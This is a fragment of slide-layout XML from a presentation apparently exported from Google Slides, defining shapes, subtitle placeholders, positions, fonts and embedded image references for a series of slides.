      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="Google Shape;502;p53"/>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53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3022829" y="7056600"/>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53"/>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53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2487776" y="9088600"/>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3"/>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04</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="Google Shape;507;p53"/>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05</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="508" name="Google Shape;508;p53"/>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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3022829" y="10984633"/>
            <a:ext cx="18969601"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53"/>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11" name="Google Shape;511;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="5186567"/>
            <a:ext cx="24377701" cy="1575300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="4144550" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marR="0" lvl="0" algn="r"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12" name="Google Shape;512;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32458" y="7061800"/>
            <a:ext cx="24443101"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13" name="Google Shape;513;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32458" y="9052400"/>
            <a:ext cx="24377701" cy="1575300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="4144550" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marR="0" lvl="0" algn="r"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14" name="Google Shape;514;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="10984600"/>
            <a:ext cx="24443101"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15"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516" name="Google Shape;516;p5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54"/>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18" name="Google Shape;518;p54"/>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19" name="Google Shape;519;p54"/>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520" name="Google Shape;520;p5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21" name="Google Shape;521;p54"/>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522" name="Google Shape;522;p5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23" name="Google Shape;523;p54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32592" y="3728000"/>
            <a:ext cx="243777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24" name="Google Shape;524;p5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5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5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54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32592" y="59561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28" name="Google Shape;528;p54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8203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29" name="Google Shape;529;p54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="104506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530" name="Google Shape;530;p5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1" name="Google Shape;531;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5938928"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="532" name="Google Shape;532;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152516" y="10444195"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="533" name="Google Shape;533;p5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38"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Google Shape;39;p28"/>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0" name="Google Shape;40;p28"/>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41" name="Google Shape;41;p28"/>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42" name="Google Shape;42;p2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28"/>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44" name="Google Shape;4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5" name="Google Shape;45;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="3424667"/>
            <a:ext cx="24377701" cy="9659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34"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="535" name="Google Shape;535;p5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55"/>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37" name="Google Shape;537;p55"/>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38" name="Google Shape;538;p55"/>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539" name="Google Shape;539;p5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40" name="Google Shape;540;p55"/>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541" name="Google Shape;541;p5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42" name="Google Shape;542;p55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32592" y="3728000"/>
            <a:ext cx="243777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43" name="Google Shape;543;p5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5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5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55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32592" y="59561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47" name="Google Shape;547;p55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8203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48" name="Google Shape;548;p55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="104506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549" name="Google Shape;549;p55"/>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0" name="Google Shape;550;p55"/>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1" name="Google Shape;551;p55"/>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2" name="Google Shape;552;p55"/>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53"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="Google Shape;554;p5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56"/>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56" name="Google Shape;556;p56"/>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57" name="Google Shape;557;p56"/>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558" name="Google Shape;558;p5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59" name="Google Shape;559;p56"/>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560" name="Google Shape;560;p5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61" name="Google Shape;561;p56"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32592" y="3728000"/>
            <a:ext cx="243777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62" name="Google Shape;562;p5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5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5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56"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32592" y="59561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66" name="Google Shape;566;p56"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8203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67" name="Google Shape;567;p56"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="104506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568" name="Google Shape;568;p56"/>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69" name="Google Shape;569;p56"/>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0" name="Google Shape;570;p56"/>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1" name="Google Shape;571;p56"/>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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="573" name="Google Shape;573;p57"/>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7"/>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75" name="Google Shape;575;p57"/>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76" name="Google Shape;576;p57"/>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577" name="Google Shape;577;p5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78" name="Google Shape;578;p57"/>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579" name="Google Shape;579;p5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80" name="Google Shape;580;p57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32592" y="3728000"/>
            <a:ext cx="243777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81" name="Google Shape;581;p57"/>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57"/>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57"/>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57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32592" y="59561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85" name="Google Shape;585;p57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8203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86" name="Google Shape;586;p57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="104506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587" name="Google Shape;587;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="3740828"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="588" name="Google Shape;588;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5938928"/>
            <a:ext cx="2094298" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="589" name="Google Shape;589;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="8149861"/>
            <a:ext cx="2094298" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="590" name="Google Shape;590;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="592" name="Google Shape;592;p5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58"/>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94" name="Google Shape;594;p58"/>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95" name="Google Shape;595;p58"/>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596" name="Google Shape;596;p5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97" name="Google Shape;597;p58"/>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598" name="Google Shape;598;p5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99" name="Google Shape;599;p58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67"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00" name="Google Shape;600;p5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5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5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58"/>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04" name="Google Shape;604;p58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="267" y="7187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05" name="Google Shape;605;p58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="90282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06" name="Google Shape;606;p5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58"/>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608" name="Google Shape;608;p5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09" name="Google Shape;609;p58"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5360928"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="610" name="Google Shape;610;p5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1" name="Google Shape;611;p58"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="9047395"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="612" name="Google Shape;612;p5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13"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="614" name="Google Shape;614;p5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9"/>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16" name="Google Shape;616;p59"/>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617" name="Google Shape;617;p59"/>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618" name="Google Shape;618;p5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19" name="Google Shape;619;p59"/>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620" name="Google Shape;620;p5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21" name="Google Shape;621;p59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67"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22" name="Google Shape;622;p5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9"/>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26" name="Google Shape;626;p59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="267" y="7187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27" name="Google Shape;627;p59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="90282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28" name="Google Shape;628;p5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9"/>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630" name="Google Shape;630;p59"/>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1" name="Google Shape;631;p59"/>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2" name="Google Shape;632;p59"/>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33" name="Google Shape;633;p59"/>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34" name="Google Shape;634;p59"/>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35"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="636" name="Google Shape;636;p6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0"/>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38" name="Google Shape;638;p60"/>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639" name="Google Shape;639;p60"/>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640" name="Google Shape;640;p6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41" name="Google Shape;641;p60"/>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642" name="Google Shape;642;p6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43" name="Google Shape;643;p60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67"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44" name="Google Shape;644;p6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6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6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60"/>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48" name="Google Shape;648;p60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="267" y="7187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49" name="Google Shape;649;p60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="90282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50" name="Google Shape;650;p6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60"/>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652" name="Google Shape;652;p60"/>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53" name="Google Shape;653;p60"/>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54" name="Google Shape;654;p60"/>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55" name="Google Shape;655;p60"/>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56" name="Google Shape;656;p60"/>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57"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="658" name="Google Shape;658;p6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61"/>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60" name="Google Shape;660;p61"/>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661" name="Google Shape;661;p61"/>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662" name="Google Shape;662;p6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63" name="Google Shape;663;p61"/>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664" name="Google Shape;664;p6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65" name="Google Shape;665;p61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67"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66" name="Google Shape;666;p6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6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6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61"/>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70" name="Google Shape;670;p61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="267" y="71874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71" name="Google Shape;671;p61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="90282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72" name="Google Shape;672;p6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61"/>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674" name="Google Shape;674;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="3504095"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="675" name="Google Shape;675;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5360928"/>
            <a:ext cx="2094298" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="676" name="Google Shape;676;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="7203328"/>
            <a:ext cx="2094298" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="677" name="Google Shape;677;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="9047395"/>
            <a:ext cx="2094298" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="678" name="Google Shape;678;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>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79"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="680" name="Google Shape;680;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042607" y="33008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62"/>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82" name="Google Shape;682;p62"/>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683" name="Google Shape;683;p62"/>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684" name="Google Shape;684;p6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85" name="Google Shape;685;p62"/>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686" name="Google Shape;686;p6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87" name="Google Shape;687;p62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32392" y="33990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88" name="Google Shape;688;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="4877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62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="64532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62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="80294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62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042607" y="9605733"/>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62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="11182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62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
